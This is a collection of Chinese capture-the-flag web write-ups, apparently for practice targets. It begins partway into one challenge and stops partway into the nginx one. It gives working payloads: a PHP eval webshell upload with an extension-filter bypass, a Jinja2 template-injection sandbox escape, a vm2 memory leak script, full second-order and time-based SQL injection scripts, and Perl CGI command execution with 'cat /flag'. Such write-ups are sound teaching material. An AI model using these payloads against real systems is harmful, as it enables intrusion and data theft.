三部分flag组合一起，最终flag:

n1book{info_1s_v3ry_imp0rtant_hack}

题目名称：ics-07

题目描述：工控云管理系统项目管理页面解析漏洞

题目writeup:

启动题目场景，获得靶机网站，访问网站如下

http://111.200.241.244:50888/

根据题目描述，点击业务管理，在页面中发现有vier-soue超链接，点击链接进入发现有三块PHP源代码。
              
              
               
              
              
               
                
               
               http://111.200.241.244:50888/index.php?page=flag.php

主要代码分析如下
              
              
               
              
              
               
                
               
                <?php
               
               
                
        session_start();
               
               
                
    
               
               
                
        if (!isset($_GET[page])) {
               
               
                
          show_source(__FILE__);
               
               
                
          die();
               
               
                
        }
               
               
                
    
               
               
                
        if (isset($_GET[page]) && $_GET[page] != 'index.php') {
               
               
                
          include('flag.php');
               
               
                
        }else {
               
               
                
          header('Location: ?page=flag.php');
               
               
                
        }  //第一块PHP代码分析：参数 page 存在 且 参数page不等于index.php.才包含flag.php,那么参数?page=flag.php就会进行文件包含
               
               
                
        ?>
               
               
                
    
               
               
                
        <?php
               
               
                
         if ($_SESSION['admin']) {   //如果session["admin"]为True
               
               
                
           $con = $_POST['con'];     //con参数变量以 post提交
               
               
                
           $file = $_POST['file'];   //file参数变量以 post提交
               
               
                
           $filename = "backup/".$file;   //目录为假目录，传入file时，文件名后加上一个.
               
               
                
    
               
               
                
           if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){  \
              
              
               
              
              
               
                
               
                        //$filename正则过滤匹配规则为：过滤了.文件以及.php或者php3、php4、php5、php5、pht、phtml等文件,可通过上传文件名如为sell.php\.或者shell.php\1.php\.绕过
              
              
               
              
              
                                                                                         
               
               
                
              die("Bad file extension");
               
               
                
           }else{
               
               
                
                chdir('uploaded');  //这里切换了路径,真实的路径在 uploaded下
               
               
                
               $f = fopen($filename, 'w');   //上传以$filename文件名
               
               
                
               fwrite($f, $con);       //$con为写入的文件的内容
               
               
                
               fclose($f);
               
               
                
           }
               
               
                
         }  
               
               
                  // 第二块php代码分析：如果$_SESSION['admin'] = True，那么POST提交con和file两个参数,且将$con 的内容写到$file中，并对$filename进行正则判断，如果判断正确文件会被上传到uploaded/backup目录下。 
               
               
                
         ?>
               
               
                
    
               
               
                
        <?php
               
               
                
          if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
               
               
                
            include 'config.php';
               
               
                
            $id = mysql_real_escape_string($_GET[id]);
               
               
                
            $sql="select * from cetc007.user where id='$id'";
               
               
                
            $result = mysql_query($sql);
               
               
                
            $result = mysql_fetch_object($result);
               
               
                
          } else {
               
               
                
            $result = False;
               
               
                
            die();
               
               
                
          }
               
               
                
    
               
               
                
          if(!$result)die("<br >something wae wrong ! <br>");
               
               
                
          if($result){
               
               
                
            echo "id: ".$result->id."</br>";
               
               
                
            echo "name:".$result->user."</br>";
               
               
                
            $_SESSION['admin'] = True;
               
               
                
          }
               
               
                
         ?>
              
              
               
              
              
               
                
               
                  /* 
              
              
               
              
              
               
                
               
               第三块代码分析：
              
              
               
              
              
               
                
               
               首先使$_SESSION['admin'] = True,需要获取一个id参数， 并且id不为1，且最后一位等于9。
              
              
               
              
              
               
                
               
               floatval()用于获取变量的浮点数值，不能用于数组或对象，这里存在弱类型比较，floatval()后的值为浮点型且不完全等于1，
               
               substr要求最后一位是9，那么只要传入id=1+任意字符+9即可绕过
              
              
               
              
              
               
               
               
                */ 
               
               
                首先我们要得到admin的session的条件,满足以下2个条件： 
               
               
                1.page为flag.php满足第一块php代码 
               
               
                2.使用id=1-9来绕过第三块PHP代码过滤 
               
               
                构造payload：?page=flag.php&id=1-9 http://111.200.241.244:50888/index.php?page=flag.php&id=1-9
              
              
               
              
              
               
               
               
                
                
                
                 
                 
                 
                  
                
                
                 
               
               
                
               
               
                
                 
                
                需要对if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename))进行绕过，正则的话是判断.之后的字符，因此我们可以利用/.的方式绕过，这个方式的意思是在文件名目录下在加个空目录，相当于没加，因此达到绕过正则的目的，如shell.php/.可绕过。
               
               
                
              
              
               
              
              
               
                
               
               或者双文件名绕过，如c.php/b.php/..  也就是访问b.php的父目录，也就是 c.php ，其中 .. 代表当前目录的父目录 , .代表当前目录
              
              
               
              
              
               
                
               
               我们要写入一句话木马,以post方式传文件，post变量file为文件名，con为文件内容，且传入的文件名为上文中2种之一的绕过文件方法。
              
              
               
              
              
               
                
               
               然后上传路径原本在根目录下的/backup/目录下面，由于加了个chdir()函数，因此将根目录后面加上了/uploaded/目录，然后在跟/backup/目录
              
              
               
              
              
               
                
               
               最后的上传目录为：
              
              
               
              
              
               
                
               
               /uploaded/backup/
              
              
               
              
              
               
                
               
               构造payload： 
              
              
               
              
              
               
                
               
               con=<?php @eval($_POST[bk]) ?>&file=shell.php/.
              
              
               
              
              
               
                
               
               或者
              
              
               
              
              
               
                
               
               con=<?php @eval($_POST[bk]) ?>&file=c.php/b.php/..

http://111.200.241.244:50888/index.php?page=flag.php&id=1-9 post: 
     con=<?php @eval($_POST[bk]) ?>&file=shell.php/. 
             
             
              
              
              
               
               
               
                
              
              
               
             
             
              
             
             
              
               
              
              由于chdir(‘uploaded’)改变目录为uploaded，又加上backup/shell.php拼接，所以目录为最终的上传目录为uploaded/backup/shell.php
             
             
              
             
             
              
               
              
              http://111.200.241.244:50888/uploaded/backup/
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
             
             
              
             
             
              
               
              
              通过蚁剑连接一句话，并对进行flag查找
             
             
              
             
             
              
              
              
               http://111.200.241.244:50888/uploaded/backup/shell.php
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
               
               
                
                
                
                 
                 
                 
                  
                
                
                 
                
                
                 
                  
                 
                 最终flag:
                
                
                 
               
               
                
              
              
               
             
             
              
             
             
              
               
              
              cyberpeace{2a8cb8444abeb5af640714b9a0e3f9b7}
             
             
              
             
             
              
              
              
               题目名称：Confusion1 
              
              
               题目描述：某天，Bob说：PHP是最好的语言，但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候，我发现其存在问题。(请不要使用扫描器) 
              
              
               题目writeup: 
              
              
               启动题目场景，获得靶机网站，访问网站，页面显示了一张图片，蛇缠住了大象，猜测此系统使用了php+python(php的标志是大象，Python的标志是蛇) 
              
              
               http://111.200.241.244:63580/ 
              
              
                          
               
                
                
                
                 
               
               
                
               
               
                
                
                
                 
                  
                 
                 进入注册和登录链接，均都显示404页面报错
                
                
                 
                
                
                 
                  
                 
                 http://111.200.241.244:63580/login.php
                
                
                 
                
                
                 
                 
                 
                  
                
                
                 
                
                
                 
                  
                 
                 http://111.200.241.244:63580/register.php
                
                
                 
                
                
                 
                 
                 
                  
                  
                  
                   
                 
                 
                  
                 
                 
                  
                   
                  
                  分别对注册和登录页面源码查看，发现源码注释中都包含了flag的位置
                 
                 
                  
                 
                 
                  
                   
                  
                  view-source:http://111.200.241.244:63580/register.php
                 
                 
                  
                
                
                 
               
               
                
               
               
                
                
                
                 
                 
                 
                  
                
                
                 
                
                
                 
                  
                 
                 view-source:http://111.200.241.244:63580/login.php
                
                
                 
               
               
                
             
             
              
             
             
              
              
              
               
             
             
              猜测本题存在Python SSTI漏洞，验证一下，在url后面添加{
               {2+2}}，回车 http://111.200.241.244:63580/login.php/{
               {2+2}}， 
             
             
              
              
              
               
             
             
              
             
             
              
               
              
              界面返回2，我们输入的1+1被执行了，说明服务器执行了{
               {}}里面这一段代码，存在SSTI漏洞
             
             
              
             
             
              
              
              
               这里猜测使用的是 Python 的 Flask 框架( Flask 使用 Jinja2 作为模板引擎 ) ，所以本题的思路就是利用SSTI读取flag文件。 
              
              
               我们尝试使用经典payload直接读取flag： 
              
              
               发现页面显示“nope,find another way"说明系统进行了过滤 
              
              
               http://111.200.241.244:63580/login.php/''.__class__.__mro__[2].__subclasses__()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt').read() 
              
              
               
               
               
                
              
              
               
              
              
               
               
               
                尝试{
                 {url_for.__globals__}}
     
               
               
                http://111.200.241.244:63580/login.php/%7B%7Burl_for.__globals__%7D%7D
              
              
               
              
              
               
                
               
               页面显示“DO NOT JIAOSHI,YOU CAN NOT USE IT!"应该也被过滤了。
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
              
              
               
              
              
               
                
               
               尝试{
                {config}}
              
              
               
              
              
               
                
               
               页面显示了request方法可用
              
              
               
              
              
               
                
               
               http://111.200.241.244:63580/login.php/%7B%7Bconfig%7D%7D
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
              
              
               
              
              
               
                
               
               经过尝试，发现系统过滤了class、 subclasses、 read等关键方法,但是并未过滤request方法：
              
              
               
              
              
               
               
               
                request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) " ，所以我们可以利用request.args绕过输入黑名单，进行沙箱逃逸。 
               
               
                {
                  {
                  ''[request.args.a][request.args.b][2][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__
     
               
               
                沙箱逃逸，就是在给我们的一个代码执行环境下(Oj或使用socat生成的交互式终端),脱离种种过滤和限制,最终成功拿到shell权限的过程。其实就是闯过重重黑名单，最终拿到系统命令执行权限的过程。 
               
               
                payload如下： 
               
               
                {
                 {''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read 
               
               
                            
                
                 
                  
                 
                 http://111.200.241.244:63580/login.php/{
                  {''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read
                
                
                 
                
                
                 
                 
                 
                  
                
                
                 
              
              
               
              
              
               
                
               
               最终flag:
              
              
               
              
              
               
                
               
               cyberpeace{30c9bf8b508298a2ba7c2493e6545f52}
              
              
               
              
              
               
               
               
                题目名称：bug 
               
               
                题目writeup: 
               
               
                启动题目场景，获得靶场网站，访问网站，发现是一个登录页面，而且有注册页面和密码修改页面、 
               
               
                http://111.200.241.244:63880/index.php?module=login 
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
               
               
                
                
                
                 这里注册一个测试账号test 
               
               
                
               
               
                
                
                
                 
                  
                 
                 http://111.200.241.244:63880/index.php?module=register
                
                
                 
                
                
                 
                 
                 
                  
                 
                 
                  测试账号可以成功登陆 
                
                
                 
                
                
                 
                 
                 
                  参数输入admin1账号，密码任意，提示用户名不存在 
                 
                 
                  再参数输入用户名 admin，密码任意，发现密码不正确 根据账号返回的信息提示，可知道系统中存在admin账号 
                
                
                 
                
                
                 
                  
                 
                 尝试对test账号进行密码修改
                
                
                 
                
                
                 
                  
                 
                 http://111.200.241.244:63880/index.php?module=findpwd
                
                
                 
                
                
                 
                 
                 
                  发现可以成功修改密码 http://111.200.241.244:63880/index.php?module=findpwd&step=1&doSubmit=yes 同时对修改密码处进行抓包，将test账号修改成admin，成功将admin的密码修改为123456 使用admin账号和密码123456登陆系统，进入Manage选项时 http://111.200.241.244:63880/index.php 提示IP Not allowed！，猜测需要使用127.0.0.1访问 
                 
                 
                  在请求头部添加X-Forwarded-For: 127.0.0.1字段，进行ip伪造请求成功，并在响应页面返回了信息，其中在注释中包含了一个链接地址： 
                 
                 
                  index.php?module=filemanage&do=??? 
                 
                 
                  
                
                
                 
                
                
                 
                 
                 
                  do的参数没有给出，根据module=filemanage字眼，猜测do的内容与文件操作有关，do=upload是上传点，经过尝试得到完整的url为： 
                
                
                 
               
               
                
              
              
               
              
              
               
                
               
               http://111.200.241.244:63880/index.php?module=filemanage&do=upload
              
              
               
             
             
              
             
             
              
              
              
               
               
               
                
                
                
                 
               
               
                
               
               
                
                 
                
                根据页面显示"just image？"猜测需要绕过文件类型检测，这里想到使用一句话图片木马上传。
               
               
                
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
               
               
                
                 
                
                这里进行上传一句户图片木马，上传结果显示“Something shows it is a php”,其中检查到内容包含了php代码，这里做了文件内容过滤。
               
               
                
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
               
               
                
                 
                
                可通过<scrirpt>脚本绕过，那么可将一句话图片木马中的php代码内容修改为：<script language="php">system("ls");</script>
                
                
                 
    
               
               
                
               
               
                
                
                
                 
                 
                 
                  
                
                
                 
                
                
                 
                  
                 
                 上传修改后的一句话图片木马，返回显示为;You know what I want，证明上传的.jpg后缀名也被过滤了。
                
                
                 
               
               
                
               
               
                
                
                
                 
                 
                 
                  
                
                
                 
               
               
                
               
               
                
                 
                
                经过测试这里不仅对后缀进行了黑名单过滤，同时会检查文件头的内容以及文件内容。
               
               
                
              
              
               
              
              
               
                
               
               当上传后缀名为.php4和php5，可绕过上传，并获得flag
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
               
               
                
                 
                
                最终flag:
               
               
                
              
              
               
              
              
               
                
               
               cyberpeace{c634cfa6e4b3ffb3fd9e9b3343a76d2b}
              
              
               
              
              
               
                
               
               题目名称：leaking
              
              
               
              
              
               
                
               
               题目writeup:
              
              
               
              
              
               
                
               
               启动题目场景，获得靶场网站，访问网站，发现是一段node.js代码
              
              
               
              
              
               
               
               
                http://111.200.241.244:49495/
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
              
              
               
              
              
               
               
               
                node.js 里提供了 vm 模块，相当于一个虚拟机，可以让你在执行代码时候隔离当前的执行环境，避免被恶意代码攻击。但是这道题比较有意思 
               
               
                本题考点： 
               
               
                
                 node.js中VM2沙箱逃逸 
                 JS通过Buffer类处理二进制数据的缓冲区 
                
               
               
                首先给出题目的源码： 
              
              
               
              
              
               
                
               
               "use strict";
              
              
               
              
              
               
                
               
               var randomstring = require("randomstring");
              
              
               
              
              
               
                
               
               var express = require("express");
              
              
               
              
              
               
                
               
               var {
              
              
               
              
              
               
                
               
                   VM
              
              
               
              
              
               
                
               
               } = require("vm2");
              
              
               
              
              
               
                
               
               var fs = require("fs");
              
              
               
              
              
               
                
               
               var app = express();
              
              
               
              
              
               
                
               
               var flag = require("./config.js").flag
              
              
               
              
              
               
                
               
               app.get("/", function(req, res) {
              
              
               
              
              
               
                
               
                   res.header("Content-Type", "text/plain");
              
              
               
              
              
               
                
               
                   /*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */
              
              
               
              
              
               
                
               
                   eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")
              
              
               
              
              
               
                
               
                   if (req.query.data && req.query.data.length <= 12) {
              
              
               
              
              
               
                
               
                       var vm = new VM({
              
              
               
              
              
               
                
               
                           timeout: 1000
              
              
               
              
              
               
                
               
                       });
              
              
               
              
              
               
                
               
                       console.log(req.query.data);
              
              
               
              
              
               
                
               
                       res.send("eval ->" + vm.run(req.query.data));
              
              
               
              
              
               
                
               
                   } else {
              
              
               
              
              
               
                
               
                       res.send(fs.readFileSync(__filename).toString());
              
              
               
              
              
               
                
               
                   }
              
              
               
              
              
               
                
               
               });
              
              
               
              
              
               
                
               
               app.listen(3000, function() {
              
              
               
              
              
               
                
               
                   console.log("listening on port 3000!");
              
              
               
              
              
               
                
               
               });
              
              
               
              
              
               
                
               
               我们把关键几行代码列出来:
              
              
               
              
              
               
                
               
               eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")   
              
              
               
              
              
               
                
               
               eval就是把里面的当作javascript语句来运行
              
              
               
              
              
               
                
               
               var vm = new VM({
              
              
               
              
              
               
                
               
                           timeout: 1000
              
              
               
              
              
               
                
               
                       });
              
              
               
              
              
               
                
               
                       console.log(req.query.data);
              
              
               
              
              
               
                
               
                       res.send("eval ->" + vm.run(req.query.data));
              
              
               
              
              
               
                
               
               然后要Get传递一个data参数，将它放在vm2创建的沙盒中运行，并且对传入的参数长度进行了限制，不超过12，这里可以用数组绕过。
              
              
               
              
              
               
                
               
               该题定义变量flag，然后我们可以在沙箱里面执行任意的命令。那我们如何逃逸出去呢？
              
              
               
              
              
               
                
               
               逃逸所需知识:
              
              
               
              
              
               
               
               
                
                 
                
                在较早一点的 node 版本中 (8.0 之前)，当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer，并且这个 Buffer 是未清零的。
               
               
                
               
               
                
                 
                
                8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存。
               
               
                
              
              
               
              
              
               
                
               
               低版本的node可以使用buffer()来查看内存，只要调用过的变量，都会存在内存中
              
              
               
              
              
               
                
               
               如果使用new Buffer(size)或其别名Buffer(size))创建,则对象不会填充零,而只要是调用过的变量，一定会存在内存中，
              
              
               
              
              
               
                
               
               所以需要使用Buffer()来读取内存，使用data=Buffer(500)分配一个500的单位为8位字节的buffer，因此很容易得到姿势
              
              
               
              
              
               
                
               
               这儿的环境是8.0之前的，所以我们使用Buffer()来读取内存：
              
              
               
              
              
               
               
               
                import requests
    url = 'http://111.200.241.244:49495/?data=Buffer(500)'
    response = ''
    while 'flag' not in response:
            req = requests.get(url)
            response = req.text
            print(req.status_code)
            if 'flag{' in response:
                print(response)
                break 
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
              
              
               
              
              
               
                
               
               或者
              
              
               
             
             
              
             
             
              
              
              
               # encoding=utf-8
    import requests
    import time
    url = 'http://111.200.241.244:49495/?data=Buffer(500)'
    response = ''
    while 'flag' not in response:
            req = requests.get(url)
            response = req.text
            print(req.status_code)
            time.sleep(0.1)
            if 'flag{' in response:
                print(response)
                break 
              
              
               
    
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
              
              
               
                
               
               最终flag:
              
              
               
              
              
               
                
               
               flag{4nother_h34rtbleed_in_n0dejs}
              
              
               
             
             
              
             
             
              
               
              
              题目名称：unfinish
             
             
              
             
             
              
               
              
              题目描述：sql
             
             
              
             
             
              
               
              
              题目writeup:
             
             
              
             
             
              
               
              
              启动题目场景，获得靶机网站，访问网站，是一个登录页面
             
             
              
             
             
              
               
              
              http://111.200.241.244:64668/login.php
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
              
              
               这里尝试通过御剑目录扫描工具对其进行扫描，发现存在register.php路径 
             
             
              
             
             
              
              
              
               
               
               
                
                
                
                 
                 
                 
                  
                
                
                 
                
                
                 
                  
                 
                 访问注册页面路径，下面可以进行常规的注册
                
                
                 
               
               
                
              
              
               
             
             
              
             
             
              
              
              
               http://111.200.241.244:64668/register.php
             
             
              
             
             
              
              
              
               
               
               
                
                
                
                 
               
               
                
               
               
                
                
                
                 
                  
                 
                 登录进去以后发现只显示了注册的用户名
                
                
                 
                
                
                 
                 
                 
                  
                
                
                 
                
                
                 
                 
                 
                  这里在用户名注册一个test'用户，发现注册失败 
                 
                 
                  
                 
                 
                  再次尝试用单引号闭合进行注册 
                 
                 
                  登录进入后发现用户名bk已经转换成0，说明存在注入 
                 
                 
                  
                 
                 
                  尝试一下这里是不是二次注入(这里注入，登陆后可以看到结果) 
                 
                 
                  二次注入 
                 
                 
                  二次注入的原理，在第一次进行数据库插入数据的时候(注册时)，仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义，在写入数据库的时候还是保留了原来的数据，但是数据本身还是脏数据。 
                 
                 
                  在将数据存入到了数据库中之后，开发者就认为数据是可信的。在下一次进行需要进行查询的时候(登录后)，直接从数据库中取出了脏数据，没有进行进一步的检验和处理，这样就会造成SQL的二次注入。比如在第一次插入数据的时候，数据中带有单引号，直接插入到了数据库中；然后在下一次使用中在拼凑的过程中，就形成了二次注入。 
                 
                 
                  我们就能构造类似 
                 
                 
                  0'+1+'0
     
                 
                 
                  当登录之后若是回显出1,则存在二次注入，我们就可以构造类似 
                 
                 
                  爆出数据库 
                 
                 
                  0'+ascii(substr(database() from 1 for 1)+'0
     
                 
                 
                  爆表 
                 
                 
                  0'+ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))+'0 
                 
                 
                  
     
                 
                 
                  语句0' + ascii(substr(database(),1,1)) +'0被过滤 
                
                
                 
               
               
                
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
               
               
                
                
                
                 尝试了一遍，这里会检测逗号，用from 1 for 1代替掉逗号就行 
                
                
                 1' + ascii(substr(database() from 1 for 1)) +'1 
               
               
                
              
              
               
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
              
              
               
                
               
               登录之后可以看到ascii码
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
              
              
               
             
             
              这里在写脚本之前测试了一下,发现information_schema被过滤那就爆不了表名，所以猜测表名为flag 
             
             
              
              
              
               
               
               
                
                
                
                 
                  
                 
                 其中核心的注入代码就是：
                
                
                 
               
               
                
              
              
               
             
             
              
             
             
              
              
              
               "0' + ascii(substr((select * from flag) from %d for 1)) + '0" 
              
              
               % i
              
              
               ,
              
              
               
    
             
             
              
             
             
              
              
              
               substr的目的在于分割，防止字符串过长无法正常输出，ascii转换目的在于将flag与0想加不会出错.
    
             
             
              
             
             
              
               
              
              之后通过正则去获取login.php页面的用户名值就是flag每一位的ascii码值
             
             
              flag.py: # coding=utf8
    import requests
    import re
    
    register_url = "http://111.200.241.244:64668/register.php"
    login_url = "http://111.200.241.244:64668/login.php"
    database = ""
    table_name = ""
    column_name = ""
    flag = ""
    #获取数据库名
    for i in range(1,10):
        register_data = {
               
            'email':'test@test'+ str(i),
            'username':"0'+ascii(substr((select database()) from %d for 1))+'0"%i,
            'password':123
            }
        r = requests.post(url=register_url,data=register_data)
        login_data = {
               
            'email':'test@test'+ str(i),
            'password':123
            }
        r = requests.post(url=login_url,data=login_data)
        match = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r.text)
        asc = match.group(1)
        if asc == '0':
            break
        database = database + chr(int(asc))
    print('database:',database)
    #获取表名
    '''
    for i in range(1,20):
        register_data = {
               
            'email':'test@test'+ str(i),
            'username':"0'+ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from %d for 1))+'0"%i,
            'password':123
            }
        r = requests.post(url=register_url,data=register_data)
        print(r.text)
        login_data = {
               
            'email':'test@test'+ str(i),
            'password':123
            }
        r = requests.post(url=login_url,data=login_data)
        r.encoding = r.apparent_encoding
        print(r.text)
        match = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r.text)
        asc = match.group(1)
        if asc == '0':
            break
        table_name = table_name + chr(int(asc))
    print('table_name:',table_name)
    '''
    #获取flag
    for i in range(1,100):
        register_data = {
               
            'email':'test@test'+ str(i) + str(i),
            'username':"0'+ascii(substr((select * from flag) from %d for 1))+'0"%i,
            'password':123
            }
        r = requests.post(url=register_url,data=register_data)
        login_data = {
               
            'email':'test@test'+ str(i) + str(i),
            'password':123
            }
        r = requests.post(url=login_url,data=login_data)
        match = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r.text)
        asc = match.group(1)
        if asc == '0':
            break
        flag = flag + chr(int(asc))
    print('flag:',flag) 
             
             
              
              
              
               
               
               
                
              
              
               
             
             
              
             
             
              
               
              
              尝试进行时间延迟注入:
             
             
              
             
             
              
              
              
               # coding=utf8
    import requests
    import sys
    url='http://111.200.241.244:64668/register.php'
    flag=''
    #爆数据库sql="1' and (select case when ascii(substr(database() from {0} for 1))={1} then sleep(5) else 1 end) or ''='"
    sql="1' and (select case when ascii(substr((select * from flag) from {0} for 1))={1} then sleep(5) else 1 end) or ''='"
    for i in range(1,50):
       print('guess:',str(i))
       for ch in range(32,129):
          if ch==128:
             sys.exit(0)
          sqli=sql.format(i,ch)
          data={
                
             "email":"111@qq.com",
             "username":sqli,
             "password":"admin"
          }
          try:
             html=requests.post(url,data=data,timeout=3)
          except:
             flag+=chr(ch)
             print(flag)
             break 
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
             
             
              
             
             
              
               
              
              最终flag:
             
             
              
             
             
              
               
              
              flag{2494e4bf06734c39be2e1626f757ba4c}
             
             
              
             
             
              
               
              
              题目名称：
             
             
              
             
             
              
               
              
              题目writup:
             
             
              
             
             
              
               
              
              启动题目场景，获得靶场网站，访问网站后，有3个超链接，点进去都是.pl文件，.pl文件都是用perl编写的网页文件。
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
              
              
               
               
               
                http://111.200.241.244:49188/cgi-bin/hello.pl
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
              
              
               
              
              
               
                
               
               http://111.200.241.244:49188/cgi-bin/forms.pl
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
               
               
                
                 
                
                http://111.200.241.244:49188/cgi-bin/file.pl
               
               
                
               
               
                
                
                
                 
                 
                 
                  
                
                
                 
               
               
                
               
               
                
                 
                
                点击Files,可以上传文件并把文件内容打印出来
               
               
                
              
              
               
             
             
              
             
             
              
              
              
               
               
               
                
                
                
                 
               
               
                
               
               
                
                 
                
                猜想后台应该用了param()函数，其后台主要代码如下：
               
               
                
               
               
                
                 
                
                use strict;
               
               
                
               
               
                
                 
                
                use warnings; 
               
               
                
               
               
                
                 
                
                use CGI;
               
               
                
               
               
                
                 
                
                my $cgi= CGI->new;
               
               
                
               
               
                
                 
                
                if ( $cgi->upload( 'file' ) ) { 
               
               
                
               
               
                
                 
                
                    my $file= $cgi->param( 'file' );
               
               
                
               
               
                
                 
                
                     while ( <$file> ) { print "$_"; }
               
               
                
               
               
                
                 
                
                } 
               
               
                
               
               
                
                 
                
                param()函数会返回一个列表的文件但是只有第一个文件会被放入到下面的file变量中。如果我们传入一个ARGV的文件，那么Perl会将传入的参数作为文件名读出来。
               
               
                
               
               
                
                 
                
                对正常的上传文件进行修改,可以达到读取任意文件的目的:
               
               
                
              
              
               
              
              
               
                
               
               方法一：
              
              
               
              
              
               
               
               
                bupsuit进行抓包，将上传的文件类型及文件内容处复制再粘贴一行，将filename后面的内容去掉，内容填入ARGV,然后盲猜flag文件在/flag中，可直接读取到flag的内容 
               
               
                ARGV内容如下：(------WebKitFormBoundarygKH5XY1IilLxk70d必须和下面请求相同) 
               
               
                ------WebKitFormBoundarygKH5XY1IilLxk70d 
               
               
                Content-Disposition: form-data; name="file" 
               
               
                ARGV 
               
               
                
                
                
                 
               
               
                
               
               
                方法二： 
               
               
                或者直接先读取file.pl文件，猜测路径为：/var/www/cgi-bin/file.pl 
              
              
               
              
              
               
               
               
                
                
                
                 
                 
                 
                  
                
                
                 
               
               
                
               
               
                
                 
                
                file.pl的内容确实是上文猜测的后台主要代码，也用到了param()函数。
               
               
                
              
              
               
             
             
              
             
             
              
              
              
               然后我们利用bash来进行读取当前目录下的文件，payload为： 
              
              
               /cgi-bin/file.pl?/bin/bash%20-c%20ls${IFS}/| 
              
              
               通过管道的方式，执行任意命令，然后将其输出结果用管道传输到读入流中，这样就可以保证获取到flag文件的位置了。这里用到了${IFS}来作命令分割，原理是会将结果变成bash -c "ls/"的等价形式。 
              
              
                          
               
                
                
                
                 
               
               
                列出了当前目录下的内容，发现flag
              
              
               /cgi-bin/file.pl?/flag    #直接读取/flag文件内容 
              
              
               
               
               
                
              
              
               
              
              
               或者
    /cgi-bin/file.pl?cat%20/flag%20|            #使用命令读取/flag文件内容 
              
              
               
               
               
                
                
                
                 
               
               
                
              
              
               
              
              
               方法三： 
              
              
               首先查看当前目录下的文件，发现当前目录下没有flag文件。payload为： 
              
              
               
               
               
                /cgi-bin/file.pl?ls%20-l%20.%20| 
              
              
               
              
              
               即执行ls -l . |命令，并查看到当前目录有file.pl和forms.pl以及hello.pl三个pl文件。 
              
              
               
               
               
                
              
              
               
              
              
               然后查看file.pl的源代码，发现确实使用了param()函数。payload为： 
              
              
               /cgi-bin/file.pl?./file.pl 
              
              
                          
               
                
                
                
                 
               
               
                
              
              
               接着继续寻找flag文件，查看根目录，发现flag。payload为 
              
              
               
               
               
                /cgi-bin/file.pl?ls%20-l%20/%20| 
              
              
               
              
              
               
    
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
             
             
              
             
             
              
              
              
               最后读取flag即可。payload为 
              
              
               
               
               
                /cgi-bin/file.pl?/flag 
              
              
               
             
             
              
             
             
              
              
              
               
             
             
              
             
             
              
               
              
              方法四：
             
             
              
             
             
              
               
              
              使用awvs对靶机网站进行扫描，发现存在目录穿越和xss漏洞
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
              
              
               
                
               
               这里可以看到通过目录穿越漏洞任意读取到系统/etc/passwd的值
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
              
              
               
              
              
               
                
               
               猜测flag在根目录,直接读取到flag的内容
              
              
               
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
              
              
               
                
               
               最终flag:
              
              
               
             
             
              
             
             
              
               
              
              cyberpeace{01763543ef73fc02f332735062b2e666}
             
             
              
             
             
              
               
              
              题目名称：Web_php_wrong_nginx_config
             
             
              
             
             
              
               
              
              题目writeup:
             
             
              
             
             
              
               
              
              启动题目场景，获得靶机网站，访问网站，发现是一个登录页面
             
             
              http://111.200.241.244:60458/login.php

输入admin/admin登录，提示“网站建设中”

通过dirsearch对目标靶机网站进行扫描，发现存在robots.txt以及admin目录
             
             
              
             
             
              
               
              
              python3  dirsearch.py  -u   
              
              
               http://111.200.241.244:60458/
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
               
               
                
                 
                
                访问/robots.txt路径,发现隐藏可访问路径hint.php和Hack.php。
               
               
                
              
              
               
             
             
              
             
             
              
               
              
              http://111.200.241.244:60458/robots.txt
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
              
              
               
                
               
               访问hint.php页面显示了nginx的配置文件路径:/etc/nginx/sites-enabled/site.conf
              
              
               
             
             
              
             
             
              
               
              
